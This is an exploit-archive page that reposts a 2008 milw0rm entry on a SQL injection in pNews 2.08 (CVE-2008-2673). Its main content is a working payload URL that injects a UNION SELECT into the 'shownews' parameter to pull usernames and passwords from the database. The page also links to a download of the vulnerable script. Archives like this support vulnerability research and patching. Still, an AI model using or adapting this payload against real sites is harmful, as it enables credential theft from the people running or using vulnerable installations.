[] NeoSense
E X P L O I T S
title author type platform port cve id

pNews 2.08 - 'shownews' SQL Injection

Author: Cr@zy_King
type: webapps
platform: php
port: 
date_added: 2008-06-08 
date_updated: 2016-12-05 
verified: 1 
codes: OSVDB-46051;CVE-2008-2673 
tags: 
aliases:  
screenshot_url:  
application_url: 
pNews 2.08 Remote SqL Ä°nj. VuLn.

OrginaL : http://biyosecurity.com & http://coderx.org

Cr@zy_King / sqL L0v3r'Z Crew Co. 2008

Script Down ; http://www.powie.de/cms/filedb/file.php?id=115&filecat=&eintrag=

http://localhost/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+table/*

Greatz : aLL My Friends :P

# milw0rm.com [2008-06-09]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.